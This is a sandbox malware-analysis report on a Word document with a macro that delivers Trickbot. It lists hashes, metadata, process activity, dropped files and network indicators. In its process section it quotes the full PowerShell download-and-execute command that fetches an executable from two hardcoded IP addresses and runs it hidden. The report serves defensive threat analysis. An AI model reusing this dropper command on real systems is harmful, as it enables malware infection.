analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2018-11-12-attached-Word-doc-with-macro-for-Trickbot.doc

Full analysis: https://app.any.run/tasks/6e686666-a855-4139-b574-c30e890b58be
Verdict: Malicious activity
Analysis date: November 14, 2018, 18:34:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: user, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Nov 12 16:26:00 2018, Last Saved Time/Date: Mon Nov 12 16:27:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

A75671F6AF2F8932844EED6261569CAA

SHA1:

5DA2FB92C644BAF9BE01FE5A05A4D0C46869868E

SHA256:

2ADFB28FD7E46EEEA6315204A633B2992050E205F1D1C1499A524AF82F0FC064

SSDEEP:

3072:bNeGcJAI3SXYVkT3QFVIPS7HeMxGtqv7NM+K9+MMX7pkxSZxo0STM:bIGuR3SXn3uI4+ZEoKikx5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 4032)
      • cmd.exe (PID: 3960)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3120)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3120)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2692)
      • powershell.exe (PID: 3324)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2692)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3120)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: -
Subject: -
Author: user
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: user
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2018:11:12 16:26:00
ModifyDate: 2018:11:12 16:27:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3120"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2018-11-12-attached-Word-doc-with-macro-for-Trickbot.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3960cmd /c powershell "'powershell ""<#start#>function norase([string] $mstr){(new-object system.net.webclient).downloadfile($mstr,''%tmp%\tmp119.exe'');<#add info#>start-process ''%tmp%\tmp119.exe'';}try{norase(''http://46.173.218.172/alfa.gir'')}catch{norase(''http://46.173.218.175/alfa.gir'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp239.bat; start-process '%tmp%\tmp239.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2692powershell "'powershell ""<#start#>function norase([string] $mstr){(new-object system.net.webclient).downloadfile($mstr,''C:\Users\admin\AppData\Local\Temp\tmp119.exe'');<#add info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp119.exe'';}try{norase(''http://46.173.218.172/alfa.gir'')}catch{norase(''http://46.173.218.175/alfa.gir'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp239.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp239.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4032cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp239.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3324powershell "<#start#>function norase([string] $mstr){(new-object system.net.webclient).downloadfile($mstr,'C:\Users\admin\AppData\Local\Temp\tmp119.exe');<#add info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp119.exe';}try{norase('http://46.173.218.172/alfa.gir')}catch{norase('http://46.173.218.175/alfa.gir')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 788
Read events
1 338
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3120WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B6A.tmp.cvr
MD5:
SHA256:
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HQAZ85UD1TXH13EAUHT0.temp
MD5:
SHA256:
3324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WK8TGGEODAKQHKU1T4UL.temp
MD5:
SHA256:
3120WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:30CE21127B7B92D5E9AE80565473CB0A
SHA256:1281B5A85F3D87CEBEF7B8690A4BCC3861E20D552B623BD226D0C150FE41EC1C
3324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a3e6.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a760.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
2692powershell.exeC:\Users\admin\AppData\Local\Temp\tmp239.battext
MD5:75A507A86EC21AC2B4763D1E47CF56AE
SHA256:83B9C22973E197EBFA84C49AC3327145063E338CC13C70313CD57611E5E91662
3120WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$18-11-12-attached-Word-doc-with-macro-for-Trickbot.docpgc
MD5:624E4DF9CF53433D67EB927CEA67FDF3
SHA256:7C0A655803B562828A40159F7D7327905AC7ABAC709153314AB1D9750C35B356
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3324
powershell.exe
GET
46.173.218.172:80
http://46.173.218.172/alfa.gir
RU
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3324
powershell.exe
46.173.218.172:80
Garant-Park-Internet Ltd
RU
suspicious

DNS requests

No data

Threats

No threats detected
No debug info